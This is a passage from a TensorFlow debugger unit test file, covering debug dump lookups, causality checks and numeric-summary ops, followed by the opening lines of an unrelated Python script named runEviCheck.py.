expected_partition_graph_count=self._expected_partition_graph_count)
def has_bad_value(_, tensor):
return np.any(np.isnan(tensor)) or np.any(np.isinf(tensor))
# Find all "offending tensors".
bad_data = dump.find(has_bad_value)
# Verify that the nodes with bad values are caught through running find
# on the debug dump.
self.assertEqual(3, len(bad_data))
self.assertEqual(x_name, bad_data[0].node_name)
self.assertEqual(y_name, bad_data[1].node_name)
self.assertEqual(z_name, bad_data[2].node_name)
# Test first_n kwarg of find(): Find the first offending tensor.
first_bad_datum = dump.find(has_bad_value, first_n=1)
self.assertEqual(1, len(first_bad_datum))
self.assertEqual(x_name, first_bad_datum[0].node_name)
def _session_run_for_graph_structure_lookup(self):
with session.Session() as sess:
u_name = "testDumpGraphStructureLookup/u"
v_name = "testDumpGraphStructureLookup/v"
w_name = "testDumpGraphStructureLookup/w"
u_init = constant_op.constant([2.0, 4.0])
u = variables.Variable(u_init, name=u_name)
v = math_ops.add(u, u, name=v_name)
w = math_ops.add(v, v, name=w_name)
u.initializer.run()
_, dump = self._debug_run_and_get_dump(
sess, w,
expected_partition_graph_count=self._expected_partition_graph_count)
return u_name, v_name, w_name, dump
def testGraphStructureLookupGivesDevicesAndNodesInfo(self):
u_name, _, _, dump = self._session_run_for_graph_structure_lookup()
# Test num_devices().
self.assertEqual(self._expected_num_devices, len(dump.devices()))
# Test node_device().
self.assertEqual(self._main_device, dump.node_device(u_name))
with self.assertRaisesRegexp(ValueError,
"does not exist in partition graphs"):
dump.node_device(u_name + "foo")
# Test node_exists().
self.assertTrue(dump.node_exists(u_name))
self.assertTrue(dump.node_exists(u_name + "/read"))
self.assertFalse(dump.node_exists(u_name + "/read" + "/foo"))
def testGraphStructureLookupGivesNodesAndAttributes(self):
u_name, _, _, dump = self._session_run_for_graph_structure_lookup()
u_read_name = u_name + "/read"
# Test node name list lookup of the DebugDumpDir object.
if test_util.gpu_device_name():
node_names = dump.nodes(
device_name="/job:localhost/replica:0/task:0/gpu:0")
else:
node_names = dump.nodes()
self.assertTrue(u_name in node_names)
self.assertTrue(u_read_name in node_names)
# Test querying node attributes.
u_attr = dump.node_attributes(u_name)
self.assertEqual(dtypes.float32, u_attr["dtype"].type)
self.assertEqual(1, len(u_attr["shape"].shape.dim))
self.assertEqual(2, u_attr["shape"].shape.dim[0].size)
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.node_attributes("foo")
def testGraphStructureLookupGivesDebugWatchKeys(self):
u_name, v_name, w_name, dump = (
self._session_run_for_graph_structure_lookup())
# Test querying the debug watch keys with node names.
self.assertEqual(["%s:0:DebugIdentity" % u_name],
dump.debug_watch_keys(u_name))
self.assertEqual(["%s:0:DebugIdentity" % v_name],
dump.debug_watch_keys(v_name))
self.assertEqual(["%s:0:DebugIdentity" % w_name],
dump.debug_watch_keys(w_name))
self.assertEqual([], dump.debug_watch_keys("foo"))
# Test querying debug datum instances from debug watch.
u_data = dump.watch_key_to_data(dump.debug_watch_keys(u_name)[0])
self.assertEqual(1, len(u_data))
self.assertEqual(u_name, u_data[0].node_name)
self.assertEqual(0, u_data[0].output_slot)
self.assertEqual("DebugIdentity", u_data[0].debug_op)
self.assertGreaterEqual(u_data[0].timestamp, 0)
self.assertEqual([], dump.watch_key_to_data("foo"))
def testGraphStructureLookupGivesNodeInputsAndRecipients(self):
u_name, v_name, w_name, dump = (
self._session_run_for_graph_structure_lookup())
u_read_name = u_name + "/read"
# Test the inputs lookup of the DebugDumpDir object.
self.assertEqual([], dump.node_inputs(u_name))
self.assertEqual([u_name], dump.node_inputs(u_read_name))
self.assertEqual([u_read_name] * 2, dump.node_inputs(v_name))
self.assertEqual([v_name] * 2, dump.node_inputs(w_name))
self.assertEqual([], dump.node_inputs(u_name, is_control=True))
self.assertEqual([], dump.node_inputs(u_read_name, is_control=True))
self.assertEqual([], dump.node_inputs(v_name, is_control=True))
self.assertEqual([], dump.node_inputs(w_name, is_control=True))
# Test the outputs recipient lookup of the DebugDumpDir object.
self.assertTrue(u_read_name in dump.node_recipients(u_name))
self.assertEqual(2, dump.node_recipients(u_read_name).count(v_name))
self.assertEqual(2, dump.node_recipients(v_name).count(w_name))
self.assertEqual([], dump.node_recipients(u_name, is_control=True))
self.assertEqual([], dump.node_recipients(u_read_name, is_control=True))
self.assertEqual([], dump.node_recipients(v_name, is_control=True))
self.assertEqual([], dump.node_recipients(w_name, is_control=True))
# Test errors raised on invalid node names.
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.node_inputs(u_name + "foo")
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.node_recipients(u_name + "foo")
# Test transitive_inputs().
self.assertEqual([], dump.transitive_inputs(u_name))
self.assertEqual([u_name], dump.transitive_inputs(u_read_name))
self.assertEqual(
set([u_name, u_read_name]), set(dump.transitive_inputs(v_name)))
self.assertEqual(
set([u_name, u_read_name, v_name]), set(dump.transitive_inputs(w_name)))
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.transitive_inputs(u_name + "foo")
def testGraphStructureLookupWithoutPartitionGraphsDoesNotErrorOut(self):
_, _, _, dump = self._session_run_for_graph_structure_lookup()
# Now load the dump again, without the partition graphs, so we can check
# errors are not raised because the partition graphs are loaded from the
# dump directory.
dump = debug_data.DebugDumpDir(self._dump_root, validate=False)
self.assertTrue(dump.loaded_partition_graphs())
def testGraphPathFindingOnControlEdgesWorks(self):
with session.Session() as sess:
v1 = variables.Variable(1.0, name="v1")
v2 = variables.Variable(2.0, name="v2")
v3 = variables.Variable(3.0, name="v3")
a = math_ops.add(v1, v2, name="a")
with ops.control_dependencies([a]):
c = math_ops.subtract(v3, v3, name="c")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(sess, c)
self.assertEqual(["v1", "v1/read", "a", "c"],
dump.find_some_path("v1", "c"))
self.assertIsNone(dump.find_some_path("v1", "c", include_control=False))
def testGraphPathFindingReverseRefEdgeWorks(self):
with session.Session() as sess:
v = variables.Variable(10.0, name="v")
delta = variables.Variable(1.0, name="delta")
inc_v = state_ops.assign_add(v, delta, name="inc_v")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(sess, inc_v)
self.assertEqual(
["delta", "delta/read", "inc_v", "v"],
dump.find_some_path("delta", "v", include_reversed_ref=True))
self.assertIsNone(dump.find_some_path("delta", "v"))
def testCausalityCheckOnDumpsDetectsWrongTemporalOrder(self):
with session.Session() as sess:
u_name = "testDumpCausalityCheck/u"
v_name = "testDumpCausalityCheck/v"
w_name = "testDumpCausalityCheck/w"
u_init = constant_op.constant([2.0, 4.0])
u = variables.Variable(u_init, name=u_name)
v = math_ops.add(u, u, name=v_name)
w = math_ops.add(v, v, name=w_name)
u.initializer.run()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugIdentity"],
debug_urls=self._debug_urls())
run_metadata = config_pb2.RunMetadata()
sess.run(w, options=run_options, run_metadata=run_metadata)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
# First, loading the original dump without supplying the
# partition_graphs should not cause a LookupError, validation occurs
# only with partition_graphs loaded.
debug_data.DebugDumpDir(self._dump_root)
# Now, loading the original dump with partition graphs supplied should
# succeed. The validation should pass quietly.
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
# Get the dump file names and compute their timestamps.
self.assertEqual(
1, len(dump.get_tensor_file_paths(v_name, 0, "DebugIdentity")))
v_file_path = dump.get_tensor_file_paths(v_name, 0, "DebugIdentity")[0]
self.assertEqual(
1, len(dump.get_tensor_file_paths(w_name, 0, "DebugIdentity")))
w_file_path = dump.get_tensor_file_paths(w_name, 0, "DebugIdentity")[0]
v_timestamp = int(v_file_path[v_file_path.rindex("_") + 1:])
w_timestamp = int(w_file_path[w_file_path.rindex("_") + 1:])
# Swap and slightly shift the time stamps of the last two dumped tensors,
# to simulate "causality violation", which can happen if the dump
# directory contains incomplete data and/or mixes data from different
# Session.run() calls.
v_file_path_1 = v_file_path[:v_file_path.rindex(
"_")] + "_%d" % w_timestamp
w_file_path_1 = w_file_path[:w_file_path.rindex("_")] + "_%d" % (
v_timestamp - 1)
os.rename(v_file_path, v_file_path_1)
os.rename(w_file_path, w_file_path_1)
# Load the dump directory again. Now a ValueError is expected to be
# raised due to the timestamp swap.
with self.assertRaisesRegexp(ValueError, "Causality violated"):
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
# Loading the dump directory with kwarg "validate" set explicitly to
# False should get rid of the error.
dump = debug_data.DebugDumpDir(
self._dump_root,
partition_graphs=run_metadata.partition_graphs,
validate=False)
# Next, set the two times stamps to be the same, which should be fine.
v_file_path_2 = v_file_path[:v_file_path.rindex(
"_")] + "_%d" % w_timestamp
w_file_path_2 = w_file_path[:w_file_path.rindex(
"_")] + "_%d" % w_timestamp
os.rename(v_file_path_1, v_file_path_2)
os.rename(w_file_path_1, w_file_path_2)
debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
def testWatchingOnlyOneOfTwoOutputSlotsDoesNotLeadToCausalityFailure(self):
with session.Session() as sess:
x_name = "oneOfTwoSlots/x"
u_name = "oneOfTwoSlots/u"
v_name = "oneOfTwoSlots/v"
w_name = "oneOfTwoSlots/w"
y_name = "oneOfTwoSlots/y"
x = variables.Variable([1, 3, 3, 7], dtype=dtypes.int32, name=x_name)
sess.run(x.initializer)
unique_x, indices, _ = array_ops.unique_with_counts(x, name=u_name)
v = math_ops.add(unique_x, unique_x, name=v_name)
w = math_ops.add(indices, indices, name=w_name)
y = math_ops.add(w, w, name=y_name)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
# Watch only the first output slot of u, even though it has two output
# slots.
debug_utils.add_debug_tensor_watch(
run_options, u_name, 0, debug_urls=self._debug_urls())
debug_utils.add_debug_tensor_watch(
run_options, w_name, 0, debug_urls=self._debug_urls())
debug_utils.add_debug_tensor_watch(
run_options, y_name, 0, debug_urls=self._debug_urls())
run_metadata = config_pb2.RunMetadata()
sess.run([v, y], options=run_options, run_metadata=run_metadata)
dump = debug_data.DebugDumpDir(
self._dump_root,
partition_graphs=run_metadata.partition_graphs,
validate=True)
self.assertAllClose([1, 3, 7],
dump.get_tensors(u_name, 0, "DebugIdentity")[0])
def testOutputSlotWithoutOutgoingEdgeCanBeWatched(self):
"""Test watching output slots not attached to any outgoing edges."""
with session.Session() as sess:
u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
u = constant_op.constant(u_init_val, shape=[2, 2], name="u")
# Create a control edge from a node with an output: From u to z.
# Node u will get executed only because of the control edge. The output
# tensor u:0 is not attached to any outgoing edge in the graph. This test
# checks that the debugger can watch such a tensor.
with ops.control_dependencies([u]):
z = control_flow_ops.no_op(name="z")
_, dump = self._debug_run_and_get_dump(sess, z)
# Assert that the DebugIdentity watch on u works properly.
self.assertEqual(1, len(dump.dumped_tensor_data))
datum = dump.dumped_tensor_data[0]
self.assertEqual("u", datum.node_name)
self.assertEqual(0, datum.output_slot)
self.assertEqual("DebugIdentity", datum.debug_op)
self.assertAllClose([[5.0, 3.0], [-1.0, 0.0]], datum.get_tensor())
def testWatchingVariableUpdateOpsSeesUpdatedValues(self):
"""Watch output slots on Variable-updating ops, with no emitted edges."""
with session.Session() as sess:
u_init = constant_op.constant(10.0)
u = variables.Variable(u_init, name="gdo/u")
v_init = constant_op.constant(20.0)
v = variables.Variable(v_init, name="gdo/v")
w = math_ops.multiply(u, v, name="gdo/w")
# gdo stands for GradientDescentOptimizer.
train_op = gradient_descent.GradientDescentOptimizer(
learning_rate=0.1).minimize(
w, name="gdo/train")
u.initializer.run()
v.initializer.run()
_, dump = self._debug_run_and_get_dump(sess, train_op)
update_u_data = dump.watch_key_to_data(
"gdo/train/update_gdo/u/ApplyGradientDescent:0:DebugIdentity")
self.assertEqual(1, len(update_u_data))
# Gradient descent on u: w = u * v, so dw / du = v.
# Updated value of u should be:
# 10.0 - learning_rate * v = 10.0 - 0.1 * 20.0 = 8.0
self.assertAllClose(8.0, update_u_data[0].get_tensor())
update_v_data = dump.watch_key_to_data(
"gdo/train/update_gdo/v/ApplyGradientDescent:0:DebugIdentity")
self.assertEqual(1, len(update_v_data))
# Gradient descent on u: w = u * v, so dw / dv = u.
# Updated value of u should be:
# 20.0 - learning_rate * u = 20.0 - 0.1 * 10.0 = 19.0
self.assertAllClose(19.0, update_v_data[0].get_tensor())
# Verify that the Variables u and v are updated properly.
self.assertAllClose(8.0, sess.run(u))
self.assertAllClose(19.0, sess.run(v))
def testAllowsWatchingUnconnectedOutputTensor(self):
"""Watch an output slot not emitting any edges.
(Not even control edges from the node.)
"""
with session.Session() as sess:
x_init = constant_op.constant([2, 2, 3, 5, 5])
x = variables.Variable(x_init, name="unconnected/x")
# The UniqueOp (tf.unique) has two output slots. Use only slot 0 in the
# graph. Let the debugger watch the unused slot 1.
unique_x, _ = array_ops.unique(x, name="unconnected/unique_x")
y = math_ops.add(unique_x, [0, 1, 2], name="unconnected/y")
x.initializer.run()
# Verify that only slot 0 of unique_x has recipients, while slot 1 of the
# same node does not have recipients.
unique_x_slot_0_recipients = []
unique_x_slot_1_recipients = []
for op in sess.graph.get_operations():
for inp in op.inputs:
if inp.name == "unconnected/unique_x:0":
unique_x_slot_0_recipients.append(op.name)
elif inp.name == "unconnected/unique_x:1":
unique_x_slot_1_recipients.append(op.name)
self.assertEqual(["unconnected/y"], unique_x_slot_0_recipients)
self.assertEqual([], unique_x_slot_1_recipients)
y_result, dump = self._debug_run_and_get_dump(sess, y)
self.assertAllClose([2, 4, 7], y_result)
# Assert that the connected slot (slot 0) is dumped properly.
unique_x_slot_0_dumps = dump.watch_key_to_data(
"unconnected/unique_x:0:DebugIdentity")
self.assertEqual(1, len(unique_x_slot_0_dumps))
self.assertEqual("unconnected/unique_x",
unique_x_slot_0_dumps[0].node_name)
self.assertEqual(0, unique_x_slot_0_dumps[0].output_slot)
self.assertAllClose([2, 3, 5], unique_x_slot_0_dumps[0].get_tensor())
# Assert that the unconnected slot (slot 1) is dumped properly.
unique_x_slot_1_dumps = dump.watch_key_to_data(
"unconnected/unique_x:1:DebugIdentity")
self.assertEqual(1, len(unique_x_slot_1_dumps))
self.assertEqual("unconnected/unique_x",
unique_x_slot_1_dumps[0].node_name)
self.assertEqual(1, unique_x_slot_1_dumps[0].output_slot)
self.assertAllClose([0, 0, 1, 2, 2],
unique_x_slot_1_dumps[0].get_tensor())
def testSuccessiveDebuggingRunsIncreasesCounters(self):
"""Test repeated Session.run() calls with debugger increments counters."""
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32, name="successive/ph")
x = array_ops.transpose(ph, name="mismatch/x")
y = array_ops.squeeze(ph, name="mismatch/y")
_, dump1 = self._debug_run_and_get_dump(
sess, x, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=1)
self.assertEqual(1, dump1.core_metadata.global_step)
self.assertGreaterEqual(dump1.core_metadata.session_run_index, 0)
self.assertEqual(0, dump1.core_metadata.executor_step_index)
self.assertEqual([ph.name], dump1.core_metadata.input_names)
self.assertEqual([x.name], dump1.core_metadata.output_names)
self.assertEqual([], dump1.core_metadata.target_nodes)
shutil.rmtree(self._dump_root)
# Calling run() with the same feed, same output and same debug watch
# options should increment both session_run_index and
# executor_step_index.
_, dump2 = self._debug_run_and_get_dump(
sess, x, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=2)
self.assertEqual(2, dump2.core_metadata.global_step)
self.assertEqual(dump1.core_metadata.session_run_index + 1,
dump2.core_metadata.session_run_index)
self.assertEqual(dump1.core_metadata.executor_step_index + 1,
dump2.core_metadata.executor_step_index)
self.assertEqual([ph.name], dump2.core_metadata.input_names)
self.assertEqual([x.name], dump2.core_metadata.output_names)
self.assertEqual([], dump2.core_metadata.target_nodes)
shutil.rmtree(self._dump_root)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options, sess.graph, debug_urls=self._debug_urls(), global_step=3)
# Calling run() with a different output should increment
# session_run_index, but not executor_step_index.
_, dump3 = self._debug_run_and_get_dump(
sess, y, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=3)
self.assertEqual(3, dump3.core_metadata.global_step)
self.assertEqual(dump2.core_metadata.session_run_index + 1,
dump3.core_metadata.session_run_index)
self.assertEqual(0, dump3.core_metadata.executor_step_index)
self.assertEqual([ph.name], dump3.core_metadata.input_names)
self.assertEqual([y.name], dump3.core_metadata.output_names)
self.assertEqual([], dump3.core_metadata.target_nodes)
def testDebuggingDuringOpError(self):
"""Test the debug tensor dumping when error occurs in graph runtime."""
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32, name="mismatch/ph")
x = array_ops.transpose(ph, name="mismatch/x")
m = constant_op.constant(
np.array(
[[1.0, 2.0]], dtype=np.float32), name="mismatch/m")
y = math_ops.matmul(m, x, name="mismatch/y")
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugIdentity"],
debug_urls=self._debug_urls())
with self.assertRaises(errors.OpError):
sess.run(y,
options=run_options,
feed_dict={ph: np.array([[-3.0], [0.0]])})
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertGreaterEqual(dump.core_metadata.session_run_index, 0)
self.assertGreaterEqual(dump.core_metadata.executor_step_index, 0)
self.assertEqual([ph.name], dump.core_metadata.input_names)
self.assertEqual([y.name], dump.core_metadata.output_names)
self.assertEqual([], dump.core_metadata.target_nodes)
# Despite the fact that the run() call errored out and partition_graphs
# are not available via run_metadata, the partition graphs should still
# have been loaded from the dump directory.
self.assertTrue(dump.loaded_partition_graphs())
m_dumps = dump.watch_key_to_data("mismatch/m:0:DebugIdentity")
self.assertEqual(1, len(m_dumps))
self.assertAllClose(np.array([[1.0, 2.0]]), m_dumps[0].get_tensor())
x_dumps = dump.watch_key_to_data("mismatch/x:0:DebugIdentity")
self.assertEqual(1, len(x_dumps))
self.assertAllClose(np.array([[-3.0, 0.0]]), x_dumps[0].get_tensor())
def testDebugNumericSummaryOnInitializedTensorGivesCorrectResult(self):
with session.Session() as sess:
a = variables.Variable(
[
np.nan, np.nan, 0.0, 0.0, 0.0, -1.0, -3.0, 3.0, 7.0, -np.inf,
-np.inf, np.inf, np.inf, np.inf, np.inf, np.inf, np.nan, np.nan
],
dtype=np.float32,
name="numeric_summary/a")
b = variables.Variable(
[0.0] * 18, dtype=np.float32, name="numeric_summary/b")
c = math_ops.add(a, b, name="numeric_summary/c")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(
sess, c, debug_ops=["DebugNumericSummary"])
self.assertTrue(dump.loaded_partition_graphs())
self.assertAllClose([[
1.0, 18.0, 4.0, 2.0, 2.0, 3.0, 2.0, 5.0, -3.0, 7.0, 0.85714286,
8.97959184, 1.0, 1.0, 18.0
]], dump.get_tensors("numeric_summary/a/read", 0, "DebugNumericSummary"))
def testDebugNumericSummaryOnUninitializedTensorGivesCorrectResult(self):
with session.Session() as sess:
a = variables.Variable(
[42], dtype=np.float32, name="numeric_summary_uninit/a")
_, dump = self._debug_run_and_get_dump(
sess, a.initializer, debug_ops=["DebugNumericSummary"])
self.assertTrue(dump.loaded_partition_graphs())
# DebugNumericSummary output should reflect the uninitialized state of
# the watched tensor.
numeric_summary = dump.get_tensors("numeric_summary_uninit/a", 0,
"DebugNumericSummary")[0]
self.assertAllClose([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
numeric_summary[0:8])
# Check dtype (index 12), ndims (index 13) and dimension sizes (index
# 14+).
self.assertAllClose([1.0, 1.0, 1.0], numeric_summary[12:])
self.assertTrue(np.isinf(numeric_summary[8]))
self.assertGreater(numeric_summary[8], 0.0)
self.assertTrue(np.isinf(numeric_summary[9]))
self.assertLess(numeric_summary[9], 0.0)
self.assertTrue(np.isnan(numeric_summary[10]))
self.assertTrue(np.isnan(numeric_summary[11]))
def testDebugNumericSummaryFailureIsToleratedWhenOrdered(self):
with session.Session() as sess:
a = variables.Variable("1", name="a")
b = variables.Variable("3", name="b")
c = variables.Variable("2", name="c")
d = math_ops.add(a, b, name="d")
e = math_ops.add(d, c, name="e")
n = parsing_ops.string_to_number(e, name="n")
m = math_ops.add(n, n, name="m")
sess.run(variables.global_variables_initializer())
# Using DebugNumericSummary on sess.run(m) with the default
# tolerate_debug_op_creation_failures=False should error out due to the
# presence of string-dtype Tensors in the graph.
run_metadata = config_pb2.RunMetadata()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary"],
debug_urls=self._debug_urls())
with self.assertRaises(errors.FailedPreconditionError):
sess.run(m, options=run_options, run_metadata=run_metadata)
# Using tolerate_debug_op_creation_failures=True should get rid of the
# error.
m_result, dump = self._debug_run_and_get_dump(
sess, m, debug_ops=["DebugNumericSummary"],
tolerate_debug_op_creation_failures=True)
self.assertEqual(264, m_result)
# The integer-dtype Tensors in the graph should have been dumped
# properly.
self.assertIn("n:0:DebugNumericSummary", dump.debug_watch_keys("n"))
self.assertIn("m:0:DebugNumericSummary", dump.debug_watch_keys("m"))
def testDebugNumericSummaryInvalidAttributesStringAreCaught(self):
with session.Session() as sess:
a = variables.Variable(10.0, name="a")
b = variables.Variable(0.0, name="b")
c = variables.Variable(0.0, name="c")
x = math_ops.divide(a, b, name="x")
y = math_ops.multiply(x, c, name="y")
sess.run(variables.global_variables_initializer())
run_metadata = config_pb2.RunMetadata()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary(foo=1.0)"],
debug_urls=self._debug_urls())
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
r"1 attribute key\(s\) were not valid for debug node "
r"__dbg_a:0_0_DebugNumericSummary: foo"):
sess.run(y, options=run_options, run_metadata=run_metadata)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary(foo=1.0; bar=false)"],
debug_urls=self._debug_urls())
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
r"2 attribute key\(s\) were not valid for debug node "
r"__dbg_a:0_0_DebugNumericSummary:"):
sess.run(y, options=run_options, run_metadata=run_metadata)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary(foo=1.0; mute_if_healthy=true)"],
debug_urls=self._debug_urls())
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
r"1 attribute key\(s\) were not valid for debug node "
r"__dbg_a:0_0_DebugNumericSummary: foo"):
sess.run(y, options=run_options, run_metadata=run_metadata)
def testDebugNumericSummaryMuteOnHealthyMutesOnlyHealthyTensorDumps(self):
with session.Session() as sess:
a = variables.Variable(10.0, name="a")
b = variables.Variable(0.0, name="b")
c = variables.Variable(0.0, name="c")
x = math_ops.divide(a, b, name="x")
y = math_ops.multiply(x, c, name="y")
sess.run(variables.global_variables_initializer())
# Here, validate=False is necessary to avoid causality check error.
# TODO(cais): Maybe let DebugDumpDir constructor automatically ignore
# debug ops with mute_if_healthy=false attribute during validation.
_, dump = self._debug_run_and_get_dump(
sess, y, debug_ops=["DebugNumericSummary(mute_if_healthy=true)"],
validate=False)
self.assertEqual(2, dump.size)
self.assertAllClose([[
1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, np.inf, -np.inf, np.nan,
np.nan, 1.0, 0.0
]], dump.get_tensors("x", 0, "DebugNumericSummary"))
self.assertAllClose([[
1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, np.inf, -np.inf, np.nan,
np.nan, 1.0, 0.0
]], dump.get_tensors("y", 0, "DebugNumericSummary"))
# Another run with the default mute_if_healthy (false) value should
# dump all the tensors.
shutil.rmtree(self._dump_root)
_, dump = self._debug_run_and_get_dump(
sess, y, debug_ops=["DebugNumericSummary()"])
self.assertEqual(8, dump.size)
def testDebugNumericSummaryMuteOnHealthyAndCustomBoundsWork(self):
with session.Session() as sess:
a = variables.Variable([10.0, 10.0], name="a")
b = variables.Variable([10.0, 2.0], name="b")
x = math_ops.add(a, b, name="x") # [20.0, 12.0]
y = math_ops.divide(x, b, name="y") # [2.0, 6.0]
sess.run(variables.global_variables_initializer())
# Here, validate=False is necessary to avoid causality check error.
# TODO(cais): Maybe let DebugDumpDir constructor automatically ignore
# debug ops with mute_if_healthy=false attribute during validation.
_, dump = self._debug_run_and_get_dump(
sess, y, debug_ops=[
"DebugNumericSummary(mute_if_healthy=true; upper_bound=11.0)"],
validate=False)
self.assertEqual(1, dump.size)
self.assertAllClose([[
1.0, 2.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0, 12.0, 20.0, 16.0, 16.0, 1.0,
1.0, 2.0]], dump.get_tensors("x", 0, "DebugNumericSummary"))
def testDebugQueueOpsDoesNotoErrorOut(self):
with session.Session() as sess:
q = data_flow_ops.FIFOQueue(3, "float", name="fifo_queue")
q_init = q.enqueue_many(([101.0, 202.0, 303.0],), name="enqueue_many")
_, dump = self._debug_run_and_get_dump(sess, q_init)
self.assertTrue(dump.loaded_partition_graphs())
fifo_queue_tensor = dump.get_tensors("fifo_queue", 0, "DebugIdentity")[0]
self.assertIsInstance(fifo_queue_tensor,
debug_data.InconvertibleTensorProto)
self.assertTrue(fifo_queue_tensor.initialized)
self.assertAllClose(
[101.0, 202.0, 303.0],
dump.get_tensors("enqueue_many/component_0", 0, "DebugIdentity")[0])
def testLookUpNodePythonTracebackWorks(self):
with session.Session() as sess:
u_init = constant_op.constant(10.0)
u = variables.Variable(u_init, name="traceback/u")
v_init = constant_op.constant(20.0)
v = variables.Variable(v_init, name="traceback/v")
w = math_ops.multiply(u, v, name="traceback/w")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(sess, w)
# Prior to setting the Python graph, attempts to do traceback lookup
# should lead to exceptions.
with self.assertRaisesRegexp(
LookupError, "Python graph is not available for traceback lookup"):
dump.node_traceback("traceback/w")
dump.set_python_graph(sess.graph)
# After setting the Python graph, attempts to look up nonexistent nodes
# should lead to exceptions.
with self.assertRaisesRegexp(KeyError,
r"Cannot find node \"foo\" in Python graph"):
dump.node_traceback("foo")
# Lookup should work with node name input.
traceback = dump.node_traceback("traceback/w")
self.assertIsInstance(traceback, list)
self.assertGreater(len(traceback), 0)
for trace in traceback:
self.assertIsInstance(trace, tuple)
# Lookup should also work with tensor name input.
traceback = dump.node_traceback("traceback/w:0")
self.assertIsInstance(traceback, list)
self.assertGreater(len(traceback), 0)
for trace in traceback:
self.assertIsInstance(trace, tuple)
class DebugConcurrentRunCallsTest(test_util.TensorFlowTestCase):
"""Test for debugging concurrent Session.run() calls."""
def _get_concurrent_debug_urls(self):
"""Abstract method to generate debug URLs for concurrent debugged runs."""
raise NotImplementedError(
"_get_concurrent_debug_urls is not implemented in the base test class")
def testDebugConcurrentVariableUpdates(self):
if test.is_gpu_available():
self.skipTest("No testing concurrent runs on a single GPU.")
with session.Session() as sess:
v = variables.Variable(30.0, name="v")
constants = []
for i in xrange(self._num_concurrent_runs):
constants.append(constant_op.constant(1.0, name="c%d" % i))
incs = [
state_ops.assign_add(
v, c, use_locking=True, name=("inc%d" % i))
for (i, c) in enumerate(constants)
]
sess.run(v.initializer)
concurrent_debug_urls = self._get_concurrent_debug_urls()
def inc_job(index):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options, sess.graph, debug_urls=concurrent_debug_urls[index])
for _ in xrange(100):
sess.run(incs[index], options=run_options)
inc_threads = []
for index in xrange(self._num_concurrent_runs):
inc_thread = threading.Thread(target=functools.partial(inc_job, index))
inc_thread.start()
inc_threads.append(inc_thread)
for inc_thread in inc_threads:
inc_thread.join()
self.assertAllClose(30.0 + 1.0 * self._num_concurrent_runs * 100,
sess.run(v))
all_session_run_indices = []
for index in xrange(self._num_concurrent_runs):
dump = debug_data.DebugDumpDir(self._dump_roots[index])
self.assertTrue(dump.loaded_partition_graphs())
v_data = dump.get_tensors("v", 0, "DebugIdentity")
self.assertEqual(100, len(v_data))
# Examine all the core metadata files
core_metadata_files = glob.glob(
os.path.join(self._dump_roots[index], "_tfdbg_core*"))
timestamps = []
session_run_indices = []
executor_step_indices = []
for core_metadata_file in core_metadata_files:
with open(core_metadata_file, "rb") as f:
event = event_pb2.Event()
event.ParseFromString(f.read())
core_metadata = (
debug_data.extract_core_metadata_from_event_proto(event))
timestamps.append(event.wall_time)
session_run_indices.append(core_metadata.session_run_index)
executor_step_indices.append(core_metadata.executor_step_index)
all_session_run_indices.extend(session_run_indices)
# Assert that executor_step_index increases by one at a time.
executor_step_indices = zip(timestamps, executor_step_indices)
executor_step_indices = sorted(
executor_step_indices, key=lambda x: x[0])
for i in xrange(len(executor_step_indices) - 1):
self.assertEquals(executor_step_indices[i][1] + 1,
executor_step_indices[i + 1][1])
# Assert that session_run_index increase monotonically.
session_run_indices = zip(timestamps, session_run_indices)
session_run_indices = sorted(session_run_indices, key=lambda x: x[0])
for i in xrange(len(session_run_indices) - 1):
self.assertGreater(session_run_indices[i + 1][1],
session_run_indices[i][1])
# Assert that the session_run_indices from the concurrent run() calls are
# all unique.
self.assertEqual(len(all_session_run_indices),
len(set(all_session_run_indices)))
if __name__ == "__main__":
googletest.main()
|
runEviCheck.py
|
# MK Jul 2016
import logging.config
logging.config.fileConfig('logging.conf')
logger = logging.getLogger('runner')
import subprocess
import re
